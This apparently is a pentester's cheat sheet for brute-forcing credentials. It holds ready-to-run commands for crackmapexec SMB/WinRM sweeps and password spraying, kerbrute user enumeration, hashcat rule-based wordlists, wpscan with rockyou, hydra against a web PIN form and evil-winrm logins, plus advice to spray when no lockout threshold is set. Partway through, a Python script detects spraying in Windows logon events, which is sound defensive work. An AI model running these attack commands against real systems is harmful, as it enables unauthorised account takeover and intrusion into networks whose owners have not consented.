Brute Force

Generate Wordlist

Password possibilities:

  • username

  • summer, spring, winter

  • password

  • date (July, April, 2023, etc.)

Using Hashcat

hashcat --force --stdout -r /usr/share/hashcat/rules/best64.rule password.lst

Active Directory

Check workstations

crackmapexec smb 192.168.1.0/24
crackmapexec winrm 192.168.1.0/24


# have a user and password?
# go enumerate computers in the domain
crackmapexec smb $IP -u <username> -p <password> --computers

Password spraying

Check the password policy

crackmapexec smb $IP --pass-pol

# Check the output: if it contains a line like this, go ahead with brute force.
Account Lockout Threshold: None

Prepare targets.txt, users.txt and passwords.txt

crackmapexec winrm targets.txt -u users.txt -p passwords.txt --continue-on-success -d <domain>

crackmapexec smb $IP -u users.txt -p '<password>'
crackmapexec winrm $IP -u users.txt -p '<password>'
# --> use evil-winrm to log in
# example: evil-winrm -u mhope -p 'testpassword' -i $IP
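
A detection-side view of the spraying pattern above, as an added example that is not part of the original notes: it flags a source that fails logons against many accounts inside a short window and reports any account that then logged on from that source. The CSV layout, the thresholds and the function names are assumptions; 4625 and 4624 are the Windows failed and successful logon event IDs.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample export, one event per line: time,event_id,source_ip,account
# 4625 = failed logon, 4624 = successful logon (Windows Security log event IDs).
SAMPLE = """\
2023-07-01T09:00:01,4625,10.0.0.50,alice
2023-07-01T09:00:03,4625,10.0.0.50,bob
2023-07-01T09:00:05,4625,10.0.0.50,carol
2023-07-01T09:00:07,4625,10.0.0.50,dave
2023-07-01T09:00:09,4625,10.0.0.50,erin
2023-07-01T09:00:11,4624,10.0.0.50,frank
2023-07-01T09:01:00,4625,10.0.0.77,alice
2023-07-01T09:01:20,4625,10.0.0.77,alice
2023-07-01T08:00:00,4625,10.0.0.90,alice
2023-07-01T10:00:00,4625,10.0.0.90,bob
2023-07-01T12:00:00,4625,10.0.0.90,carol
2023-07-01T14:00:00,4625,10.0.0.90,dave
"""

def parse(text):
    """Group (time, event_id, account) rows by source IP, sorted by time."""
    by_ip = defaultdict(list)
    for line in text.strip().splitlines():
        ts, event_id, ip, account = line.split(",")
        by_ip[ip].append((datetime.fromisoformat(ts), event_id, account.lower()))
    return {ip: sorted(rows) for ip, rows in by_ip.items()}

def detect_spray(text, window=timedelta(minutes=10), min_accounts=4, max_per_account=2):
    """Flag sources failing against >= min_accounts accounts inside one window with
    <= max_per_account failures each; list accounts that logged on from them after."""
    findings = {}
    for ip, rows in parse(text).items():
        fails = [(ts, acct) for ts, eid, acct in rows if eid == "4625"]
        sprayed, first_seen, start = set(), None, 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:  # slide the window
                start += 1
            counts = Counter(acct for _, acct in fails[start:end + 1])
            if len(counts) >= min_accounts and max(counts.values()) <= max_per_account:
                sprayed |= set(counts)
                first_seen = first_seen or fails[start][0]
        if sprayed:
            hits = sorted({a for ts, eid, a in rows if eid == "4624" and ts >= first_seen})
            findings[ip] = {"sprayed": sorted(sprayed), "succeeded": hits}
    return findings

if __name__ == "__main__":
    print(detect_spray(SAMPLE))
```

An account listed under "succeeded" is the one to reset and investigate first; a spray spread over hours (10.0.0.90 in the sample) only surfaces when the window is widened.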

Kerbrute

kerbrute userenum --dc <dc ip> -d <domain> users.txt
kerbrute userenum --dc <dc ip> -d <domain> /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt


# kerbrute with NTLM hash (https://github.com/3gstudent/pyKerbrute)

WordPress Login

# WPScan 3.x renamed the old --wordlist/--username options to --passwords/--usernames
wpscan --url <wordpress url> --passwords /usr/share/wordlists/rockyou.txt --usernames <username>

Website Login Brute Force

hydra -l '' -P 3digits.txt -f -v 10.10.171.8 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
